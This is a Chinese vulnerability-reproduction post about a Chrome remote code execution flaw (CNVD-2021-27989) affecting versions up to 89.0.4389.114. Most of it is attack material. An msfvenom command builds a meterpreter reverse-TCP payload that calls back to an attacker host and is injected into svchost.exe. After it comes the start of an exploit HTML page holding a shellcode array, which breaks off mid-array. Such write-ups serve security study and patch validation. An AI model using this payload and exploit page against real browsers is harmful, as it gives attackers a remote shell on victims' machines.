文章目录
一、漏洞描述
安全公告编号:CNTA-2021-0015
2021年4月14日,国家信息安全漏洞共享平台(CNVD)收录了Google Chrome远程代码执行漏洞(CNVD-2021-27989)。攻击者利用该漏洞,可在未授权的情况下远程执行代码。目前,漏洞细节已公开,厂商已发布新版本修复该漏洞。
二、漏洞影响范围
Chrome <= 89.0.4389.114
使用chrome内核的其他浏览器,也会受到漏洞影响。
三、漏洞复现
1.利用msf生成payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.11 lport=6666 PrependMigrate=true PrependMigrateProc=svchost.exe -f csharp -o payload.txt
PrependMigrate=true PrependMigrateProc=svchost.exe 将payload注入到指定进程
2.生成exp页面
将payload.txt里的内容替换到msf.html
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [0xfc,0xe8,0xc1,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,
0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,
0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,
0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,
0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x68,0x48,0x01,0xd0,0x50,0x8b,0x48,
0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0x67,0xe3,0x56,0x48,0xff,0xc9,0x41,
0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd7,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x56,0xff,0xff,0xff,0x5d,0x48,0x81,0xc4,0x70,0xfe,0xff,0xff,0x48,0x8d,0x4c,
0x24,0x30,0x41,0xba,0xb1,0x4a,0x6b,0xb1,0xff,0xd5,0xe9,0x93,0x00,0x00,0x00,
0x5e,0x6a,0x00,0x48,0x8d,0xbc,0x24,0x20,0x01,0x00,0x00,0x57,0x48,0x8d,